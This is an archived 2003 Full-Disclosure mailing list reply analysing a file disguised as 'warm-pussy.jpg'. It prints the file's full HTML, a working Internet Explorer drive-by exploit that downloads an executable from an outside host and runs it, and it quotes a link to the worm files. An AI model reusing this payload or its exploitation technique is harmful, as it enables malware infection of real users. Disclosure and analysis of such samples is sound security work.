lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <001601c3a954$4c3514c0$320a0a0a@falcon>
From: segfault at nycap.rr.com (segfault)
Subject: new worm - "warm-pussy.jpg".

You idiot.  Just because a file is called warm-pussy.jpg, doesn't mean that
the webserver it resides on isn't going to parse it's actual content (which
is probably plaintext).  Look again, I'm sure you'll be surprised.

Contents of warm-pussy.jpg:

<html>
<head>
</head>
<body onLoad="doit()">
<p>
  <textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","http://vnm.musx.net/moep.exe",0);
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
  <textarea id="code2" style="display: none;">
md="&lt;object id=\"oFile\""+
    " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
    " codebase=\"c:/windows/temp/browsercheck.exe\"&gt;&lt;/object&gt;";
w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
  <script language="javascript">
    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {
            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/"/g,"\\\"");
            line = line.replace(/[/]/g,"%2f");
            line = line.replace(/\r\n/,"");
            line += ' ';
            if (line != '') {
                result += line;
            }
        }
        return result;
    }
    function weiter() {
        open(myURL,"_search");
    }
    function starten(thecode) {
        mycode = preparecode(thecode);
        myURL = "file:javascript:eval('" + mycode + "')";
        open("http:///","_search");
        setTimeout("weiter()", 500);
    }
    function doit() {
    starten(document.all.code.value);
    setTimeout("doit2()", 600);
    }
    function doit2() {
    starten(document.all.code2.value);
    }
</script>
</p>
<p>&nbsp;</p>
<p><br>
</p>
<p></p>
<p> <img src="nice_warm_pussy.jpg" width="640" height="480"><br>
</p>
<p><br>
</p>
</body>
</html>

----- Original Message ----- 
From: "Tom Russell" <kalleth@...dram.co.uk>
To: <full-disclosure@...ts.netsys.com>
Sent: Wednesday, November 12, 2003 1:34 PM
Subject: [Full-Disclosure] new worm - "warm-pussy.jpg".


> Manifests itself in an infected victim by saying over IRC (mIRC it seems):
>
> 1824.11| [inx-dj|eJ-Kevin] rofl wie geil, gibt euch das :)) http://
> vnm.musx.net /warm-pussy.jpg <--- einfach geil !
>
> (spaces added to guard against accidental infection)
> It is unknown at this time wether this is another variant of
irc.trojan.fgt.
> The files used in this worm can be obtained at
> http://kalleth.2tone-dev.com/fd/warm-pussy.rar in unaltered form - be
> careful what you do with them.
>
> (i take no responsibility for accidental infection.)
>
> Regards,
> Tom Russell,
> 2tone:development (www.2tone-dev.com)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ